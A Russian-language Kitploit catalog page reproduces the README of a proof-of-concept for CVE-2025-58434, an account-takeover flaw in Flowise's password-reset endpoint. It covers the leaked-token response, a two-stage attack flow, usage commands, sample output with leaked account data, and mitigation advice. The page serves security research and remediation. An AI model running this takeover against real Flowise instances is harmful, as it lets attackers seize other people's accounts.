Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-58434-poc — Эксплойт для проверки концепции для CVE-2025-58434, демонстрирующий несанкционированный захват учетных записей в Flowise через утекшие токены сброса пароля. Включает двухэтапную атаку: утечка токена и сброс пароля. | Kitploit
Инструменты/GitHubGitHub/kartik2005221/cve-2025-58434-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

Эксплойт для проверки концепции для CVE-2025-58434, демонстрирующий несанкционированный захват учетных записей в Flowise через утекшие токены сброса пароля. Включает двухэтапную атаку: утечка токена и сброс пароля.

Репозиторий
1385 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-58434 — Захват учетной записи Flowise через утечку токена

CVE CVSS Python Лицензия Раскрытие

⚠️ Этот репозиторий предназначен только для образовательных целей и авторизованных исследований безопасности.
Несанкционированное использование против систем, которыми вы не владеете или не имеете явного разрешения на тестирование, незаконно.


Содержание

  • Обзор
  • Детали уязвимости
  • Сценарий атаки
  • Затронутые версии
Структура репозитория
  • Требования
  • Установка
  • Использование
  • Пример вывода
  • Устранение
  • График раскрытия
  • Ссылки
  • Отказ от ответственности

  • Обзор

    Конечная точка forgot-password в Flowise (как в облачной, так и в локальной версии) возвращает действующий токен сброса пароля (tempToken) непосредственно в теле HTTP-ответа — без какой-либо проверки email или аутентификации.

    Это означает, что злоумышленник, знающий (или способный угадать) адрес электронной почты жертвы, может:

    1. Вызвать конечную точку forgot-password → получить tempToken в JSON-ответе
    2. Использовать tempToken для вызова reset-password → установить произвольный новый пароль
    3. Войти в систему под видом жертвы → полный захват учетной записи (ATO)

    Никакого предварительного доступа, взаимодействия с пользователем или доступа к email не требуется.


    Детали уязвимости

    ПолеЗначение
    CVE IDCVE-2025-58434
    CVSS Score9.8 (Critical)
    CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-640: Слабый механизм восстановления пароля
    ТипОбход аутентификации / Небезопасная прямая ссылка на объект
    Затронутое приложениеFlowise (облачная + локальная версия)
    Конечная точка 1POST /api/v1/account/forgot-password
    Конечная точка 2POST /api/v1/account/reset-password

    Корневая причина

    Обработчик forgot-password возвращает всю запись пользователя — включая сгенерированный tempToken — непосредственно в ответе API вместо того, чтобы только отправить его на зарегистрированный адрес электронной почты пользователя.

    root@kitploit:~
    {
      "user": {
        "id": "<uuid>",
        "name": "Victim Name",
        "email": "[email protected]",
        "credential": "<bcrypt-hash>",
        "tempToken": "<LEAKED_TOKEN_HERE>",
        "tokenExpiry": "2025-08-19T13:00:33.834Z",
        "status": "active"
      }
    }
    

    Сценарий атаки

    root@kitploit:~
    Злоумышленник                        API Flowise
       │                                       │
       │  POST /forgot-password {email}        │
       │──────────────────────────────────────►│
       │                                       │  (генерирует tempToken)
       │◄──────────────────────────────────────│
       │  201 { tempToken: "abc123..." }       │
       │                                       │
       │  POST /reset-password {email,         │
       │         tempToken, newPassword}       │
       │──────────────────────────────────────►│
       │                                       │
       │◄──────────────────────────────────────│
       │  200 OK  (пароль изменен!)            │
       │                                       │
       ✓  Захват учетной записи завершен
    

    Затронутые версии

    • Flowise Cloud (cloud.flowiseai.com) — подтверждено, что уязвима
    • Все локальные развертывания Flowise до выпуска патча

    Проверьте официальный GitHub Flowise для получения информации о выпущенном патче.


    Структура репозитория

    root@kitploit:~
    CVE-2025-58434/
    ├── cve_2025_58434_poc.py   # Основной скрипт PoC (двухэтапный ATO)
    ├── requirements.txt         # Зависимости Python
    ├── README.md                # Этот файл
    └── DISCLAIMER.md            # Правовое уведомление (прочитайте перед использованием)
    

    Требования

    • Python 3.7 или выше
    • Библиотека requests

    Установка

    root@kitploit:~
    # Клонировать репозиторий
    git clone https://github.com/yourhandle/CVE-2025-58434
    cd CVE-2025-58434
    
    # Установить зависимости
    pip install -r requirements.txt
    

    Использование

    Справка

    root@kitploit:~
    python3 cve_2025_58434_poc.py --help
    

    Этап 1 — Утечка токена (разведка)

    Подтвердить, что экземпляр уязвим, и получить tempToken без сброса пароля.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected]
    

    Этап 2 — Полный захват учетной записи

    Использовать утекший токен для немедленного сброса пароля.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --reset \
      --new-password "MyNewP@ss2025!"
    

    Вывод сырого JSON-ответа

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --json-output
    

    Все опции

    ФлагСокращениеОписаниеЗначение по умолчанию
    --url URL-uБазовый URL экземпляра Flowise(обязательно)
    --email EMAIL-eАдрес электронной почты целевой учетной записи(обязательно)
    --reset-rВыполнить Этап 2: сбросить пароль с помощью утекшего токенаFalse
    --new-password PASS-pНовый пароль для установки (используется с --reset)Changeme@2025!
    --timeout SECONDS-tТайм-аут HTTP-запроса10
    --json-output-jВывести сырой JSON-ответ API в stdoutFalse

    Пример вывода

    root@kitploit:~
      [Шаг 1] Отправка запроса forgot-password …
      [*] HTTP Status : 201
    
      ========================================================================
        УТЕКШИЕ ДАННЫЕ УЧЕТНОЙ ЗАПИСИ
      ========================================================================
        ID пользователя : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        Имя            : Admin User
        Email          : [email protected]
        Учетные данные : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        Статус         : active
        tempToken      : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
        tokenExpiry    : 2025-08-19T13:00:33.834Z
      ========================================================================
    
      [+] tempToken получен  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      [!] УЯЗВИМО: Экземпляр раскрывает токены сброса пароля без аутентификации!
    

    Устранение

    Если вы оператор экземпляра Flowise, немедленно примените следующие меры:

    1. Никогда не возвращайте токены сброса в ответах API. Отправляйте токен исключительно на зарегистрированный адрес электронной почты.
    2. Возвращайте общее сообщение об успехе от forgot-password независимо от того, существует ли email — это также предотвращает перебор учетных записей.
    3. Ограничьте использование токена:
      • Одноразовое использование (аннулировать после первого использования)
      • Короткий срок действия (например, 15 минут)
      • Привязка к IP-адресу / User-Agent запроса, где это возможно
    4. Примените исправление ко всем моделям развертывания — облачным и локальным.
    5. Добавьте ограничение скорости для конечной точки forgot-password.
    6. Регистрируйте и оповещайте о подозрительной активности сброса пароля.
    7. Рассмотрите MFA для учетных записей администратора и с высокими привилегиями.

    График раскрытия

    ДатаСобытие
    2025-08-19Уязвимость обнаружена и сообщена
    TBDПодтверждение от вендора
    TBDВыпущен патч
    TBDПубличное раскрытие

    Ссылки

    • Уведомление GitHub GHSA-wgpv-6j63-x5ph
    • NVD — CVE-2025-58434
    • Репозиторий Flowise на GitHub
    • CWE-640: Слабый механизм восстановления пароля

    Отказ от ответственности

    Этот проект предназначен исключительно для образовательных целей и авторизованного тестирования на проникновение.

    • НЕ запускайте этот инструмент против любой системы без явного письменного разрешения от владельца системы.
    • Автор(ы) этого репозитория не несут ответственности за любое неправомерное использование, ущерб или юридические последствия, возникшие в результате несанкционированного использования.
    • См. DISCLAIMER.md для полного текста правового уведомления.
    Скачать инструмент